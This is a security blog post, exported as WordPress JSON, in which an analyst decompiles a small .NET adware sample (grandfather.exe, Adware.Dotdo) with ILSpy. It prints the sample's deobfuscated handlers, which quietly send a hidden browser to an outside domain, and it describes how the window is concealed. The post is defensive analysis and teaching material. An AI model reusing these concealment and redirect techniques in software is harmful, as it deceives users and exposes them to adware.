{"id":9716,"date":"2017-10-05T09:10:39","date_gmt":"2017-10-05T17:10:39","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/05\/news-3489\/"},"modified":"2017-10-05T09:10:39","modified_gmt":"2017-10-05T17:10:39","slug":"news-3489","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/05\/news-3489\/","title":{"rendered":"Using ILSpy to analyze a small adware file"},"content":{"rendered":"<p><strong>Credit to Author: Pieter Arntz | Date: Thu, 05 Oct 2017 16:19:25 +0000<\/strong><\/p>\n<p>My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called <em>grandfather.exe<\/em>, so I went out to grab a copy and have a look at it.<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-19941\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1.png\" alt=\"\" width=\"422\" height=\"264\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1.png 422w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1-300x188.png 300w\" sizes=\"auto, (max-width: 422px) 100vw, 422px\" \/><\/p>\n<p>As you can probably tell from some of the <a href=\"https:\/\/www.virustotal.com\/#\/file\/53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240\/detection\" target=\"_blank\" rel=\"noopener\">detection names at VirusTotal<\/a>, this is an MSIL (Microsoft Intermediate Language) file. There are many tools to decompile MSIL executables, but <a href=\"http:\/\/ilspy.net\" target=\"_blank\" rel=\"noopener\">ILSpy<\/a> is my personal favorite. 
To demonstrate why, I will show you how I analyzed this very small executable, which is part of the Adware.Dotdo family.<\/p>\n<h3>Using ILSpy<\/h3>\n<p>Once you have downloaded and unzipped the binaries from their site, you can run <em>ILSpy.exe<\/em> and click <em>File &gt; Open<\/em> to navigate to the file you would like to look at.<\/p>\n<p>One advantage of ILSpy is that the code is shown in a very clear format. Just knowing how to read <a href=\"https:\/\/en.wikipedia.org\/wiki\/Pseudocode\" target=\"_blank\" rel=\"noopener\">pseudocode<\/a> and where to find the <a href=\"https:\/\/docs.microsoft.com\/en-us\/dotnet\/framework\/index\" target=\"_blank\" rel=\"noopener\">.NET documentation<\/a> will get you a long way, as I\u2019m about to demonstrate.<\/p>\n<h3>The code in the example<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-19938 size-full\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/browser.png\" alt=\"c# code\" width=\"381\" height=\"119\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/browser.png 381w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/browser-300x94.png 300w\" sizes=\"auto, (max-width: 381px) 100vw, 381px\" \/><\/p>\n<p style=\"text-align: center\"><em>Code is shown in C# format<\/em><\/p>\n<p>In this code slice, where the most important part of the program is initialized, we see three ways of hiding the program from the user:<\/p>\n<ul>\n<li>The program will not be shown in the taskbar<\/li>\n<li>The opacity is set to 0%, which means you will see right through it<\/li>\n<li>The program will not show any error prompts if script errors occur<\/li>\n<\/ul>\n<p>By the way, if you are more comfortable writing or reading code in VB.NET, you can set ILSpy to show the code in that format.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated.png\" data-rel=\"lightbox-0\" 
title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-19940 size-full\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated.png\" alt=\"obfuscated VB code \" width=\"1023\" height=\"171\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated.png 1023w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated-300x50.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated-600x100.png 600w\" sizes=\"auto, (max-width: 1023px) 100vw, 1023px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Code is shown in VB format<\/em><\/p>\n<p>The strings in the code above have been obfuscated in a very simple way, just enough to throw someone who is merely looking at strings off track.<\/p>\n<p>After applying <code>Replace(\"28851129\", string.Empty))<\/code>, which is appended to all the strings in that part of the code, this is what&#8217;s left of the two functions that will later be used as event handlers:<\/p>\n<p><code>Private Sub ie(sender As Object, e As EventArgs)<\/code><\/p>\n<p><code>Me.i.AllowNavigation = True<\/code><\/p>\n<p><code>Me.i.Navigate(\"http:\/\/www.munificentspitz.pw\/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&amp;pianoforte=01A0oKsMVTiSlSZzVJC1\")<\/code><\/p>\n<p><code>End Sub<\/code><\/p>\n<p>The event handler above simply navigates to the previously obfuscated URL.<\/p>\n<p><code>Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)<\/code><\/p>\n<p><code>If Me.i.Document.Title &lt;&gt; \"searchbox\" Then<\/code><\/p>\n<p><code>Me.i.Navigate(\"http:\/\/www3.munificentspitz.pw\/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&amp;pianoforte=01A0oKsMVTiSlSZzVJC1\")<\/code><\/p>\n<p><code>End If<\/code><\/p>\n<p><code>End Sub<\/code><\/p>\n<p>This event handler determines where the browser connects to, based on 
the title of the current document. If the title of the loaded page does not match \u201csearchbox\u201d, it simply redirects the browser to the second, previously obfuscated URL. If the title already is \u201csearchbox\u201d, it does nothing.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-19939\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize.png\" alt=\"VB code\" width=\"817\" height=\"325\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize.png 817w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize-300x119.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize-600x239.png 600w\" sizes=\"auto, (max-width: 817px) 100vw, 817px\" \/><\/p>\n<p>This is where the browser control (\u2018this\u2019) is initialized, while the layout of the main window (\u2018base\u2019) is postponed until the browser is ready to go. All the control&#8217;s edges are docked to the edges of its containing control and sized appropriately: with the <em>DockStyle.Fill<\/em> property set, the browser resizes to fill all of the empty space in its parent container.<\/p>\n<p>Then the location, size, and name are set, and the control is also hidden by setting its <em>Visible<\/em> property to <em>false<\/em>.<\/p>\n<p>When the new document is fully loaded, the <em>DocumentCompleted<\/em> event fires, and its handler is the (lightly) obfuscated function we discussed earlier, so that is what gets triggered.<\/p>\n<p>The <em>AutoScaleDimensions<\/em> property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property is set by the Windows Forms designer to the value your monitor is currently using. 
The <em>Font<\/em> is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.<\/p>\n<p>Then, after the browser control has been added to the base application, the first event handler is called, which, as mentioned earlier, hides the main window and initializes the browser.<\/p>\n<h3>Summary<\/h3>\n<p>The &#8220;program&#8221; stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention of fetching further instructions. At the moment of writing, the site contains two iframes connecting to <em>videojelly[.]com<\/em> and <em>whos.amung[.]us<\/em>, a visitor counter.<\/p>\n<p>I tried to show why I like ILSpy as a tool to decompile .NET and browse the assembly.<\/p>\n<p>The file we looked at has:<\/p>\n<p>SHA-256: 53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240<\/p>\n<p>Grandfather.exe is now detected as Adware.Dotdo.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-19942\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1a.png\" alt=\"Adware.Dotdo\" width=\"422\" height=\"316\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1a.png 422w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1a-300x225.png 300w\" sizes=\"auto, (max-width: 422px) 100vw, 422px\" \/><\/p>\n<p><em>Pieter Arntz<\/em><\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/\">Using ILSpy to analyze a small adware file<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a 
href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Pieter Arntz| Date: Thu, 05 Oct 2017 16:19:25 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/' title='Using ILSpy to analyze a small adware file'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/shutterstock_75130144.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>ILSpy is an open-source .NET assembly browser and decompiler. We demonstrate its use looking at a simple adware file.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/net\/\" rel=\"tag\">.NET<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/adware\/\" rel=\"tag\">adware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/assembly\/\" rel=\"tag\">assembly<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/decompile\/\" rel=\"tag\">decompile<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/dotdo\/\" rel=\"tag\">dotdo<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/grandfather-exe\/\" rel=\"tag\">grandfather.exe<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/ilspy\/\" rel=\"tag\">ilspy<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/pieter-arntz\/\" rel=\"tag\">Pieter Arntz<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a 
href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/' title='Using ILSpy to analyze a small adware file'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/\">Using ILSpy to analyze a small adware file<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[12999,10468,15531,15532,15533,15534,15535,3764,10523,10494],"class_list":["post-9716","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-net","tag-adware","tag-assembly","tag-decompile","tag-dotdo","tag-grandfather-exe","tag-ilspy","tag-malware","tag-pieter-arntz","tag-threat-analysis"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9716"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9716\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"htt
p:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9716"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}